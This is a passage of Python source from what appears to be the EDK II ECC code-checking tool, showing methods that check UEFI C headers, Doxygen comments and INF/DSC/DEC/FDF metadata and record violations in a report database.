EdkLogger.quiet(\"[NON-BOOLEAN]\" + FullName)\r\n c.CheckNonBooleanValueComparison(FullName)\r\n\r\n # Check that any comparison of a 
pointer to zero is done via the NULL type\r\n def PredicateExpressionCheckComparisonNullType(self):\r\n if EccGlobalData.gConfig.PredicateExpressionCheckComparisonNullType == '1' or EccGlobalData.gConfig.PredicateExpressionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking predicate expression NULL pointer ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# EdkLogger.quiet(\"[POINTER]\" + FullName)\r\n# c.CheckPointerNullComparison(FullName)\r\n for FullName in EccGlobalData.gCFileList:\r\n EdkLogger.quiet(\"[POINTER]\" + FullName)\r\n c.CheckPointerNullComparison(FullName)\r\n\r\n # Include file checking\r\n def IncludeFileCheck(self):\r\n self.IncludeFileCheckIfndef()\r\n self.IncludeFileCheckData()\r\n self.IncludeFileCheckSameName()\r\n\r\n # Check whether there are include files with the same name\r\n def IncludeFileCheckSameName(self):\r\n if EccGlobalData.gConfig.IncludeFileCheckSameName == '1' or EccGlobalData.gConfig.IncludeFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking same header file name ...\")\r\n SqlCommand = \"\"\"select ID, FullPath from File\r\n where Model = 1002 order by Name \"\"\"\r\n RecordDict = {}\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n List = Record[1].replace('/', '\\\\').split('\\\\')\r\n if len(List) >= 2:\r\n Key = List[-2] + '\\\\' + List[-1]\r\n else:\r\n Key = List[0]\r\n if Key not in RecordDict:\r\n RecordDict[Key] = [Record]\r\n else:\r\n RecordDict[Key].append(Record)\r\n\r\n for Key in RecordDict:\r\n if len(RecordDict[Key]) > 1:\r\n for Item in RecordDict[Key]:\r\n Path = mws.relpath(Item[1], EccGlobalData.gWorkspace)\r\n if not EccGlobalData.gException.IsException(ERROR_INCLUDE_FILE_CHECK_NAME, Path):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_INCLUDE_FILE_CHECK_NAME, OtherMsg=\"The file name for [%s] is duplicated\" % Path, BelongsToTable='File', BelongsToItem=Item[0])\r\n\r\n # Check whether all include file contents are guarded by an #ifndef statement.\r\n def IncludeFileCheckIfndef(self):\r\n if EccGlobalData.gConfig.IncludeFileCheckIfndefStatement == '1' or EccGlobalData.gConfig.IncludeFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking header file ifndef ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# MsgList = c.CheckHeaderFileIfndef(FullName)\r\n for FullName in EccGlobalData.gHFileList:\r\n MsgList = c.CheckHeaderFileIfndef(FullName)\r\n\r\n # Check that include files do NOT contain code or define data variables\r\n def IncludeFileCheckData(self):\r\n if EccGlobalData.gConfig.IncludeFileCheckData == '1' or EccGlobalData.gConfig.IncludeFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking header file data ...\")\r\n\r\n # Get all typedef functions\r\n gAllTypedefFun = []\r\n for IdentifierTable in EccGlobalData.gIdentifierTableList:\r\n SqlCommand = \"\"\"select Name from %s\r\n where Model = %s \"\"\" % (IdentifierTable, MODEL_IDENTIFIER_TYPEDEF)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if Record[0].startswith('('):\r\n gAllTypedefFun.append(Record[0])\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F 
in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# MsgList = c.CheckHeaderFileData(FullName)\r\n for FullName in EccGlobalData.gHFileList:\r\n MsgList = c.CheckHeaderFileData(FullName, gAllTypedefFun)\r\n\r\n # Doxygen document checking\r\n def DoxygenCheck(self):\r\n self.DoxygenCheckFileHeader()\r\n self.DoxygenCheckFunctionHeader()\r\n self.DoxygenCheckCommentDescription()\r\n self.DoxygenCheckCommentFormat()\r\n self.DoxygenCheckCommand()\r\n\r\n # Check whether the file headers follow the Doxygen special documentation blocks in section 2.3.5\r\n def DoxygenCheckFileHeader(self):\r\n if EccGlobalData.gConfig.DoxygenCheckFileHeader == '1' or EccGlobalData.gConfig.DoxygenCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Doxygen file header ...\")\r\n\r\n for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n for F in Filenames:\r\n Ext = os.path.splitext(F)[1]\r\n if Ext in ('.h', '.c'):\r\n FullName = os.path.join(Dirpath, F)\r\n MsgList = c.CheckFileHeaderDoxygenComments(FullName)\r\n elif Ext in ('.inf', '.dec', '.dsc', '.fdf'):\r\n FullName = os.path.join(Dirpath, F)\r\n op = open(FullName).readlines()\r\n FileLinesList = op\r\n LineNo = 0\r\n CurrentSection = MODEL_UNKNOWN\r\n HeaderSectionLines = []\r\n HeaderCommentStart = False\r\n HeaderCommentEnd = False\r\n\r\n for Line in FileLinesList:\r\n LineNo = LineNo + 1\r\n Line = Line.strip()\r\n if (LineNo < len(FileLinesList) - 1):\r\n NextLine = FileLinesList[LineNo].strip()\r\n\r\n #\r\n # blank line\r\n #\r\n if (Line == '' or not Line) and LineNo == len(FileLinesList):\r\n LastSectionFlag = True\r\n\r\n #\r\n # check whether file header comment section started\r\n #\r\n if Line.startswith('#') and \\\r\n (Line.find('@file') > -1) and \\\r\n not HeaderCommentStart:\r\n if CurrentSection != MODEL_UNKNOWN:\r\n SqlStatement = \"\"\" select ID from File where FullPath like '%s'\"\"\" % FullName\r\n ResultSet = EccGlobalData.gDb.TblFile.Exec(SqlStatement)\r\n for Result in ResultSet:\r\n Msg = 'INF/DEC/DSC/FDF file header comment should begin with \"\"## @file\"\" or \"\"# @file\"\" at the very top of the file'\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_DOXYGEN_CHECK_FILE_HEADER, Msg, \"File\", Result[0])\r\n\r\n else:\r\n CurrentSection = MODEL_IDENTIFIER_FILE_HEADER\r\n #\r\n # Append the first line to section lines.\r\n #\r\n HeaderSectionLines.append((Line, LineNo))\r\n HeaderCommentStart = True\r\n continue\r\n\r\n #\r\n # Collect Header content.\r\n #\r\n if (Line.startswith('#') and CurrentSection == MODEL_IDENTIFIER_FILE_HEADER) and\\\r\n HeaderCommentStart and not Line.startswith('##') and not\\\r\n HeaderCommentEnd and NextLine != '':\r\n HeaderSectionLines.append((Line, LineNo))\r\n continue\r\n #\r\n # Header content end\r\n #\r\n if (Line.startswith('##') or not Line.strip().startswith(\"#\")) and HeaderCommentStart \\\r\n and not HeaderCommentEnd:\r\n if Line.startswith('##'):\r\n HeaderCommentEnd = True\r\n HeaderSectionLines.append((Line, LineNo))\r\n ParseHeaderCommentSection(HeaderSectionLines, FullName)\r\n break\r\n if HeaderCommentStart == False:\r\n SqlStatement = \"\"\" select ID from File where FullPath like '%s'\"\"\" % FullName\r\n ResultSet = EccGlobalData.gDb.TblFile.Exec(SqlStatement)\r\n for Result in ResultSet:\r\n Msg = 'INF/DEC/DSC/FDF file header comment should begin with \"\"## @file\"\" or \"\"# @file\"\" at the very top of the file'\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_DOXYGEN_CHECK_FILE_HEADER, Msg, \"File\", 
Result[0])\r\n if HeaderCommentEnd == False:\r\n SqlStatement = \"\"\" select ID from File where FullPath like '%s'\"\"\" % FullName\r\n ResultSet = EccGlobalData.gDb.TblFile.Exec(SqlStatement)\r\n for Result in ResultSet:\r\n Msg = 'INF/DEC/DSC/FDF file header comment should end with \"\"##\"\" at the end of the file header comment block'\r\n # Check whether the file header comment ends with '##'\r\n if EccGlobalData.gConfig.HeaderCheckFileCommentEnd == '1' or EccGlobalData.gConfig.HeaderCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_DOXYGEN_CHECK_FILE_HEADER, Msg, \"File\", Result[0])\r\n\r\n\r\n\r\n # Check whether the function headers follow the Doxygen special documentation blocks in section 2.3.5\r\n def DoxygenCheckFunctionHeader(self):\r\n if EccGlobalData.gConfig.DoxygenCheckFunctionHeader == '1' or EccGlobalData.gConfig.DoxygenCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Doxygen function header ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# MsgList = c.CheckFuncHeaderDoxygenComments(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n MsgList = c.CheckFuncHeaderDoxygenComments(FullName)\r\n\r\n\r\n # Check whether the first line of text in a comment block is a brief description of the element being documented.\r\n # The brief description must end with a period.\r\n def DoxygenCheckCommentDescription(self):\r\n if EccGlobalData.gConfig.DoxygenCheckCommentDescription == '1' or EccGlobalData.gConfig.DoxygenCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n pass\r\n\r\n # Check whether comment lines with '///< ... text ...' 
format, if it is used, it should be after the code section.\r\n def DoxygenCheckCommentFormat(self):\r\n if EccGlobalData.gConfig.DoxygenCheckCommentFormat == '1' or EccGlobalData.gConfig.DoxygenCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Doxygen comment ///< ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# MsgList = c.CheckDoxygenTripleForwardSlash(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n MsgList = c.CheckDoxygenTripleForwardSlash(FullName)\r\n\r\n # Check whether only Doxygen commands allowed to mark the code are @bug and @todo.\r\n def DoxygenCheckCommand(self):\r\n if EccGlobalData.gConfig.DoxygenCheckCommand == '1' or EccGlobalData.gConfig.DoxygenCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Doxygen command ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# MsgList = c.CheckDoxygenCommand(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n MsgList = c.CheckDoxygenCommand(FullName)\r\n\r\n # Meta-Data File Processing Checking\r\n def MetaDataFileCheck(self):\r\n self.MetaDataFileCheckPathName()\r\n self.MetaDataFileCheckGenerateFileList()\r\n self.MetaDataFileCheckLibraryInstance()\r\n self.MetaDataFileCheckLibraryInstanceDependent()\r\n self.MetaDataFileCheckLibraryInstanceOrder()\r\n self.MetaDataFileCheckLibraryNoUse()\r\n self.MetaDataFileCheckLibraryDefinedInDec()\r\n self.MetaDataFileCheckBinaryInfInFdf()\r\n self.MetaDataFileCheckPcdDuplicate()\r\n self.MetaDataFileCheckPcdFlash()\r\n self.MetaDataFileCheckPcdNoUse()\r\n self.MetaDataFileCheckGuidDuplicate()\r\n self.MetaDataFileCheckModuleFileNoUse()\r\n self.MetaDataFileCheckPcdType()\r\n self.MetaDataFileCheckModuleFileGuidDuplication()\r\n self.MetaDataFileCheckModuleFileGuidFormat()\r\n self.MetaDataFileCheckModuleFileProtocolFormat()\r\n self.MetaDataFileCheckModuleFilePpiFormat()\r\n self.MetaDataFileCheckModuleFilePcdFormat()\r\n\r\n # Check whether each file defined in meta-data exists\r\n def MetaDataFileCheckPathName(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckPathName == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n # This item is covered when parsing Inf/Dec/Dsc files\r\n pass\r\n\r\n # Generate a list for all files defined in meta-data files\r\n def MetaDataFileCheckGenerateFileList(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckGenerateFileList == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n # This item is covered when parsing Inf/Dec/Dsc files\r\n pass\r\n\r\n # Check whether all Library Instances defined for a given module (or dependent library instance) match the module's type.\r\n # Each Library Instance must specify the Supported Module Types in its Inf file,\r\n # and any module specifying the library instance must be one of the supported types.\r\n def MetaDataFileCheckLibraryInstance(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckLibraryInstance == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for library instance type issue ...\")\r\n SqlCommand = 
\"\"\"select A.ID, A.Value3, B.Value3 from Inf as A left join Inf as B\r\n where A.Value2 = 'LIBRARY_CLASS' and A.Model = %s\r\n and B.Value2 = 'MODULE_TYPE' and B.Model = %s and A.BelongsToFile = B.BelongsToFile\r\n group by A.BelongsToFile\"\"\" % (MODEL_META_DATA_HEADER, MODEL_META_DATA_HEADER)\r\n RecordSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n LibraryClasses = {}\r\n for Record in RecordSet:\r\n List = Record[1].split('|', 1)\r\n SupModType = []\r\n if len(List) == 1:\r\n SupModType = DT.SUP_MODULE_LIST_STRING.split(DT.TAB_VALUE_SPLIT)\r\n elif len(List) == 2:\r\n SupModType = List[1].split()\r\n\r\n if List[0] not in LibraryClasses:\r\n LibraryClasses[List[0]] = SupModType\r\n else:\r\n for Item in SupModType:\r\n if Item not in LibraryClasses[List[0]]:\r\n LibraryClasses[List[0]].append(Item)\r\n\r\n if Record[2] != DT.SUP_MODULE_BASE and Record[2] not in SupModType:\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_LIBRARY_INSTANCE_2, OtherMsg=\"The Library Class '%s' does not specify its supported module types\" % (List[0]), BelongsToTable='Inf', BelongsToItem=Record[0])\r\n\r\n SqlCommand = \"\"\"select A.ID, A.Value1, B.Value3 from Inf as A left join Inf as B\r\n where A.Model = %s and B.Value2 = '%s' and B.Model = %s\r\n and B.BelongsToFile = A.BelongsToFile\"\"\" \\\r\n % (MODEL_EFI_LIBRARY_CLASS, 'MODULE_TYPE', MODEL_META_DATA_HEADER)\r\n RecordSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n # Merge all LibraryClasses' supmodlist\r\n RecordDict = {}\r\n for Record in RecordSet:\r\n if Record[1] not in RecordDict:\r\n RecordDict[Record[1]] = [str(Record[2])]\r\n else:\r\n if Record[2] not in RecordDict[Record[1]]:\r\n RecordDict[Record[1]].append(Record[2])\r\n\r\n for Record in RecordSet:\r\n if Record[1] in LibraryClasses:\r\n if Record[2] not in LibraryClasses[Record[1]] and DT.SUP_MODULE_BASE not in RecordDict[Record[1]]:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_LIBRARY_INSTANCE_1, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_LIBRARY_INSTANCE_1, OtherMsg=\"The type of Library Class [%s] defined in Inf file does not match the type of the module\" % (Record[1]), BelongsToTable='Inf', BelongsToItem=Record[0])\r\n else:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_LIBRARY_INSTANCE_1, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_LIBRARY_INSTANCE_1, OtherMsg=\"The type of Library Class [%s] defined in Inf file does not match the type of the module\" % (Record[1]), BelongsToTable='Inf', BelongsToItem=Record[0])\r\n\r\n # Check whether a Library Instance has been defined for all dependent library classes\r\n def MetaDataFileCheckLibraryInstanceDependent(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckLibraryInstanceDependent == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for library instance dependent issue ...\")\r\n SqlCommand = \"\"\"select ID, Value1, Value2 from Dsc where Model = %s\"\"\" % MODEL_EFI_LIBRARY_CLASS\r\n LibraryClasses = EccGlobalData.gDb.TblDsc.Exec(SqlCommand)\r\n for LibraryClass in LibraryClasses:\r\n if LibraryClass[1].upper() == 'NULL' or LibraryClass[1].startswith('!ifdef') or LibraryClass[1].startswith('!ifndef') or LibraryClass[1].endswith('!endif'):\r\n continue\r\n else:\r\n LibraryIns = os.path.normpath(mws.join(EccGlobalData.gWorkspace, LibraryClass[2]))\r\n SkipDirString = 
'|'.join(EccGlobalData.gConfig.SkipDirList)\r\n p = re.compile(r'.*[\\\\/](?:%s^\\S)[\\\\/]?.*' % SkipDirString)\r\n if p.match(os.path.split(LibraryIns)[0].upper()):\r\n continue\r\n SqlCommand = \"\"\"select Value3 from Inf where BelongsToFile =\r\n (select ID from File where lower(FullPath) = lower('%s'))\r\n and Value2 = '%s'\"\"\" % (LibraryIns, DT.PLATFORM_COMPONENT_TYPE_LIBRARY_CLASS)\r\n RecordSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n IsFound = False\r\n for Record in RecordSet:\r\n LibName = Record[0].split('|', 1)[0]\r\n if LibraryClass[1] == LibName:\r\n IsFound = True\r\n if not IsFound:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_LIBRARY_INSTANCE_DEPENDENT, LibraryClass[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_LIBRARY_INSTANCE_DEPENDENT, OtherMsg=\"The Library Class [%s] is not specified in '%s'\" % (LibraryClass[1], LibraryClass[2]), BelongsToTable='Dsc', BelongsToItem=LibraryClass[0])\r\n\r\n # Check whether the Library Instances specified by the LibraryClasses sections are listed in order of dependencies\r\n def MetaDataFileCheckLibraryInstanceOrder(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckLibraryInstanceOrder == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n # This checkpoint is not necessary for Ecc check\r\n pass\r\n\r\n # Check whether the unnecessary inclusion of library classes in the Inf file\r\n # Check whether the unnecessary duplication of library classe names in the DSC file\r\n def MetaDataFileCheckLibraryNoUse(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckLibraryNoUse == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for library instance not used ...\")\r\n SqlCommand = \"\"\"select ID, Value1 from Inf as A where A.Model = %s and A.Value1 not in (select B.Value1 from Dsc as B where Model = %s)\"\"\" % (MODEL_EFI_LIBRARY_CLASS, MODEL_EFI_LIBRARY_CLASS)\r\n RecordSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_LIBRARY_NO_USE, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_LIBRARY_NO_USE, OtherMsg=\"The Library Class [%s] is not used in any platform\" % (Record[1]), BelongsToTable='Inf', BelongsToItem=Record[0])\r\n SqlCommand = \"\"\"\r\n select A.ID, A.Value1, A.BelongsToFile, A.StartLine, B.StartLine from Dsc as A left join Dsc as B\r\n where A.Model = %s and B.Model = %s and A.Scope1 = B.Scope1 and A.Scope2 = B.Scope2 and A.ID != B.ID\r\n and A.Value1 = B.Value1 and A.Value2 != B.Value2 and A.BelongsToItem = -1 and B.BelongsToItem = -1 and A.StartLine != B.StartLine and B.BelongsToFile = A.BelongsToFile\"\"\" \\\r\n % (MODEL_EFI_LIBRARY_CLASS, MODEL_EFI_LIBRARY_CLASS)\r\n RecordSet = EccGlobalData.gDb.TblDsc.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if Record[3] and Record[4] and Record[3] != Record[4] and Record[1] != 'NULL':\r\n SqlCommand = \"\"\"select FullPath from File where ID = %s\"\"\" % (Record[2])\r\n FilePathList = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for FilePath in FilePathList:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_LIBRARY_NAME_DUPLICATE, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_LIBRARY_NAME_DUPLICATE, OtherMsg=\"The Library Class [%s] is duplicated in '%s' line %s and line %s.\" % (Record[1], 
FilePath, Record[3], Record[4]), BelongsToTable='Dsc', BelongsToItem=Record[0])\r\n\r\n # Check the header file in Include\\Library directory whether be defined in the package DEC file.\r\n def MetaDataFileCheckLibraryDefinedInDec(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckLibraryDefinedInDec == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for library instance whether be defined in the package dec file ...\")\r\n SqlCommand = \"\"\"\r\n select A.Value1, A.StartLine, A.ID, B.Value1 from Inf as A left join Dec as B\r\n on A.Model = B.Model and A.Value1 = B.Value1 where A.Model=%s\r\n \"\"\" % MODEL_EFI_LIBRARY_CLASS\r\n RecordSet = EccGlobalData.gDb.TblDsc.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n LibraryInInf, Line, ID, LibraryDec = Record\r\n if not LibraryDec:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_LIBRARY_NOT_DEFINED, LibraryInInf):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_LIBRARY_NOT_DEFINED, \\\r\n OtherMsg=\"The Library Class [%s] in %s line is not defined in the associated package file.\" % (LibraryInInf, Line),\r\n BelongsToTable='Inf', BelongsToItem=ID)\r\n\r\n # Check whether an Inf file is specified in the FDF file, but not in the Dsc file, then the Inf file must be for a Binary module only\r\n def MetaDataFileCheckBinaryInfInFdf(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckBinaryInfInFdf == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for non-binary modules defined in FDF files ...\")\r\n SqlCommand = \"\"\"select A.ID, A.Value1 from Fdf as A\r\n where A.Model = %s\r\n and A.Enabled > -1\r\n and A.Value1 not in\r\n (select B.Value1 from Dsc as B\r\n where B.Model = %s\r\n and B.Enabled > -1)\"\"\" % (MODEL_META_DATA_COMPONENT, MODEL_META_DATA_COMPONENT)\r\n RecordSet = EccGlobalData.gDb.TblFdf.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n FdfID = Record[0]\r\n FilePath = Record[1]\r\n FilePath = os.path.normpath(mws.join(EccGlobalData.gWorkspace, FilePath))\r\n SqlCommand = \"\"\"select ID from Inf where Model = %s and BelongsToFile = (select ID from File where FullPath like '%s')\r\n \"\"\" % (MODEL_EFI_SOURCE_FILE, FilePath)\r\n NewRecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n if NewRecordSet != []:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_BINARY_INF_IN_FDF, FilePath):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_BINARY_INF_IN_FDF, OtherMsg=\"File [%s] defined in FDF file and not in DSC file must be a binary module\" % (FilePath), BelongsToTable='Fdf', BelongsToItem=FdfID)\r\n\r\n # Check whether a PCD is set in a Dsc file or the FDF file, but not in both.\r\n def MetaDataFileCheckPcdDuplicate(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckPcdDuplicate == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for duplicate PCDs defined in both DSC and FDF files ...\")\r\n SqlCommand = \"\"\"\r\n select A.ID, A.Value1, A.Value2, A.BelongsToFile, B.ID, B.Value1, B.Value2, B.BelongsToFile from Dsc as A, Fdf as B\r\n where A.Model >= %s and A.Model < %s\r\n and B.Model >= %s and B.Model < %s\r\n and A.Value1 = B.Value1\r\n and A.Value2 = B.Value2\r\n and A.Enabled > -1\r\n and B.Enabled > -1\r\n group by A.ID\r\n \"\"\" % (MODEL_PCD, MODEL_META_DATA_HEADER, MODEL_PCD, 
MODEL_META_DATA_HEADER)\r\n RecordSet = EccGlobalData.gDb.TblDsc.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n SqlCommand1 = \"\"\"select Name from File where ID = %s\"\"\" % Record[3]\r\n SqlCommand2 = \"\"\"select Name from File where ID = %s\"\"\" % Record[7]\r\n DscFileName = os.path.splitext(EccGlobalData.gDb.TblDsc.Exec(SqlCommand1)[0][0])[0]\r\n FdfFileName = os.path.splitext(EccGlobalData.gDb.TblDsc.Exec(SqlCommand2)[0][0])[0]\r\n if DscFileName != FdfFileName:\r\n continue\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_PCD_DUPLICATE, Record[1] + '.' + Record[2]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_DUPLICATE, OtherMsg=\"The PCD [%s] is defined in both FDF file and DSC file\" % (Record[1] + '.' + Record[2]), BelongsToTable='Dsc', BelongsToItem=Record[0])\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_PCD_DUPLICATE, Record[5] + '.' + Record[6]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_DUPLICATE, OtherMsg=\"The PCD [%s] is defined in both FDF file and DSC file\" % (Record[5] + '.' + Record[6]), BelongsToTable='Fdf', BelongsToItem=Record[4])\r\n\r\n EdkLogger.quiet(\"Checking for duplicate PCDs defined in DEC files ...\")\r\n SqlCommand = \"\"\"\r\n select A.ID, A.Value1, A.Value2, A.Model, B.Model from Dec as A left join Dec as B\r\n where A.Model >= %s and A.Model < %s\r\n and B.Model >= %s and B.Model < %s\r\n and A.Value1 = B.Value1\r\n and A.Value2 = B.Value2\r\n and A.Scope1 = B.Scope1\r\n and A.ID != B.ID\r\n and A.Model = B.Model\r\n and A.Enabled > -1\r\n and B.Enabled > -1\r\n and A.BelongsToFile = B.BelongsToFile\r\n group by A.ID\r\n \"\"\" % (MODEL_PCD, MODEL_META_DATA_HEADER, MODEL_PCD, MODEL_META_DATA_HEADER)\r\n RecordSet = EccGlobalData.gDb.TblDec.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n RecordCat = Record[1] + '.' + Record[2]\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_PCD_DUPLICATE, RecordCat):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_DUPLICATE, OtherMsg=\"The PCD [%s] is defined duplicated in DEC file\" % RecordCat, BelongsToTable='Dec', BelongsToItem=Record[0])\r\n\r\n # Check whether PCD settings in the FDF file can only be related to flash.\r\n def MetaDataFileCheckPcdFlash(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckPcdFlash == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking only Flash related PCDs are used in FDF ...\")\r\n SqlCommand = \"\"\"\r\n select ID, Value1, Value2, BelongsToFile from Fdf as A\r\n where A.Model >= %s and Model < %s\r\n and A.Enabled > -1\r\n and A.Value2 not like '%%Flash%%'\r\n \"\"\" % (MODEL_PCD, MODEL_META_DATA_HEADER)\r\n RecordSet = EccGlobalData.gDb.TblFdf.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_PCD_FLASH, Record[1] + '.' + Record[2]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_FLASH, OtherMsg=\"The PCD [%s] defined in FDF file is not related to Flash\" % (Record[1] + '.' 
+ Record[2]), BelongsToTable='Fdf', BelongsToItem=Record[0])\r\n\r\n # Check whether PCDs used in Inf files but not specified in Dsc or FDF files\r\n def MetaDataFileCheckPcdNoUse(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckPcdNoUse == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for non-specified PCDs ...\")\r\n SqlCommand = \"\"\"\r\n select ID, Value1, Value2, BelongsToFile from Inf as A\r\n where A.Model >= %s and Model < %s\r\n and A.Enabled > -1\r\n and (A.Value1, A.Value2) not in\r\n (select Value1, Value2 from Dsc as B\r\n where B.Model >= %s and B.Model < %s\r\n and B.Enabled > -1)\r\n and (A.Value1, A.Value2) not in\r\n (select Value1, Value2 from Fdf as C\r\n where C.Model >= %s and C.Model < %s\r\n and C.Enabled > -1)\r\n \"\"\" % (MODEL_PCD, MODEL_META_DATA_HEADER, MODEL_PCD, MODEL_META_DATA_HEADER, MODEL_PCD, MODEL_META_DATA_HEADER)\r\n RecordSet = 